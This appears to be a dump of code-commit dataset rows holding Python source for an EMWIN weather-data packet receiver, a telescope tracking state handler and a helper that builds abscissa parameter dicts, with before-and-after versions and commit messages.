header = header.split('/', 5)
header = (x for x in header if x)
header = ((x[:2], x[2:].strip(' ')) for x in header)
return dict(header)
def verify_checksum(self):
checksum = sum([ord(x) for x in self.payload])
if int(self.checksum) != checksum:
raise ValueError('Checksum failed! Got: %i Expecting: %i' % (checksum, self.checksum))
def dict(self):
d = {}
for field in ('filename', 'block', 'total_blocks', 'timestamp'):
value = getattr(self, field)
d[field] = value
return d
def __str__(self):
return '%s (%i/%i)' % (self.filename, self.block, self.total_blocks)
class FileAssembler(object):
def __init__(self, filename, callback=None):
self.filename = filename
self.callback = callback
self.parts = {}
def add_part(self, packet):
self.parts[packet.block] = packet.payload
self.check_parts(packet)
def check_parts(self, packet):
if self.callback is None:
return
if not None in [self.parts.get(i, None) for i in range(1, packet.total_blocks + 1)]:
parts = self.parts.items()
parts.sort(key=lambda x: x[0])
content = ''.join([x[1] for x in parts])
if not self.filename.endswith('.ZIS'):
content = content.rstrip('\x00')
self.content = content
self.callback(self.filename, self.content)
| from time import strptime, mktime
import logging
import sys
handler = logging.StreamHandler()
handler.setFormatter(logging.Formatter('%(asctime)s %(name)s %(levelname)s %(message)s'))
log = logging.getLogger('emwin')
log.addHandler(handler)
log.setLevel(logging.DEBUG)
class Connection(object):
def __init__(self, sock):
self.sock = sock
def __iter__(self):
buf = ''
while True:
buf += self.sock.recv(1116)
if buf == '':
break
while len(buf) >= 1116:
if not buf.startswith('\xFF\xFF\xFF\xFF\xFF\xFF'):
offset = buf.find('\xFF\xFF\xFF\xFF\xFF\xFF')
if offset == -1:
log.info('Sync marker missing! Resetting buffer!')
buf = ''
continue
buf = buf[offset:]
log.info('Discarding %i bytes before sync marker' % offset)
try:
packet = Packet(buf[:1116])
log.debug(str(packet))
yield packet
except:
log.error(sys.exc_info()[1])
buf = buf[1116:]
log.error('Connection closed by remote host')
self.sock.close()
class Packet(object):
def __init__(self, data):
self.data = data
self.parse()
def parse(self):
self.data = ''.join([chr(ord(x) ^ 0xFF) for x in self.data])
self.header = self.parse_header(self.data[:86])
self.filename = self.header['PF']
self.block = int(self.header['PN'])
self.total_blocks = int(self.header['PT'])
self.checksum = int(self.header['CS'])
self.timestamp = int(mktime(strptime(self.header['FD'], '%m/%d/%Y %I:%M:%S %p')))
self.payload = self.data[86:-6]
if len(self.payload) != 1024:
raise ValueError('Packet is the wrong size!')
self.verify_checksum()
def parse_header(self, data):
if data[:6] != ('\x00' * 6):
raise ValueError('Invalid packet header')
data = data[6:]
header = data.rstrip(' \r\n')
header = header.split('/', 5)
header = (x for x in header if x)
header = ((x[:2], x[2:].strip(' ')) for x in header)
return dict(header)
def verify_checksum(self):
checksum = sum([ord(x) for x in self.payload])
if int(self.checksum) != checksum:
raise ValueError('Checksum failed! Got: %i Expecting: %i' % (checksum, self.checksum))
def dict(self):
d = {}
for field in ('filename', 'block', 'total_blocks', 'timestamp'):
value = getattr(self, field)
d[field] = value
return d
def __str__(self):
return '%s (%i/%i)' % (self.filename, self.block, self.total_blocks)
class FileAssembler(object):
    """Collects per-block payloads for one file and delivers it when complete.

    Blocks arrive out of order; each is stored by block number. Once blocks
    1..total_blocks are all present, the payloads are concatenated in order
    and ``callback(filename, content)`` is invoked. Files that are not
    ``.ZIS`` archives have their trailing NUL padding stripped.
    """

    def __init__(self, filename, callback=None):
        self.filename = filename
        self.callback = callback
        self.parts = {}  # block number -> payload string

    def add_part(self, packet):
        """Store one packet's payload, then check whether the file is complete."""
        self.parts[packet.block] = packet.payload
        self.check_parts(packet)

    def check_parts(self, packet):
        """If every block 1..total_blocks has arrived, assemble and deliver."""
        if self.callback is None:
            return
        if all(i in self.parts for i in range(1, packet.total_blocks + 1)):
            # Fixed: the original called .sort() on dict.items(), which only
            # works on Python 2 (where items() returns a list); sorted() is
            # equivalent there and also correct on Python 3.
            ordered = sorted(self.parts.items(), key=lambda item: item[0])
            content = ''.join(payload for _, payload in ordered)
            if not self.filename.endswith('.ZIS'):
                # Non-archive products are NUL-padded to a block boundary.
                content = content.rstrip('\x00')
            self.content = content
            self.callback(self.filename, self.content)
| Python | 0.000008 |
32446090486db452342ec76606d28a05f6736e81 | Update tracking.py | panoptes/state/states/default/tracking.py | panoptes/state/states/default/tracking.py | import time
def on_enter(event_data):
    """ The unit is tracking the target. Proceed to observations. """
    pan = event_data.model
    pan.say("Checking our tracking")
    pan.goto(_adjust_tracking(pan))


def _adjust_tracking(pan):
    """Run the tracking adjustment and return the next state's name."""
    # Park unless the adjustment below completes.
    next_state = 'parking'
    try:
        pan.say("I'm adjusting the tracking rate")
        # Tracking-rate update is currently disabled:
        #pan.observatory.update_tracking()
        next_state = 'observe'
        pan.say("Done with tracking adjustment, going to observe")
        # Brief pause, trying to prevent a state-machine stall.
        time.sleep(2)
    except Exception as e:
        pan.logger.warning("Tracking problem: {}".format(e))
        pan.say("Yikes! A problem while updating our tracking.")
    return next_state
| import time
def on_enter(event_data):
    """ The unit is tracking the target. Proceed to observations. """
    pan = event_data.model
    pan.say("Checking our tracking")
    pan.goto(_attempt_tracking_update(pan))


def _attempt_tracking_update(pan):
    """Try to update the tracking rate; return the next state's name."""
    # Park unless the adjustment below completes.
    next_state = 'parking'
    try:
        pan.say("I'm adjusting the tracking rate")
        pan.observatory.update_tracking()
        next_state = 'observe'
        pan.say("Done with tracking adjustment, going to observe")
        # Brief pause, trying to prevent a state-machine stall.
        time.sleep(2)
    except Exception as e:
        pan.logger.warning("Tracking problem: {}".format(e))
        pan.say("Yikes! A problem while updating our tracking.")
    return next_state
| Python | 0.000001 |
cbae828ee9eb91a2373a415f1a1521fb5dee3100 | Add method to generate list of abscissa dicts | datac/main.py | datac/main.py | # -*- coding: utf-8 -*-
import copy
def init_abscissa(params, abscissae, abscissa_name):
    """
    List of dicts to initialize object w/ calc method

    Builds one dict per abscissa value. Each dict carries the constant
    ``params`` entries (shallow-copied so the caller's dict is untouched),
    the abscissa value stored under ``abscissa_name``, and the name itself
    under the key ``"abscissa_name"``. Together these are sufficient to
    initialize an object featuring a calculator method of interest.

    :param dict params: Static parameters required to initialize the object
        featuring the ordinate calculator method.
    :param list abscissae: Independent variable also required to initialize
        object featuring the ordinate calculator method.
    :param str abscissa_name: Dictionary key for the abscissa name.
    """
    def _make_record(value):
        # Shallow copy keeps the caller's params dict unmodified.
        record = copy.copy(params)
        record[abscissa_name] = value
        record["abscissa_name"] = abscissa_name
        return record

    return [_make_record(value) for value in abscissae]
| # -*- coding: utf-8 -*-
import copy
| Python | 0 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.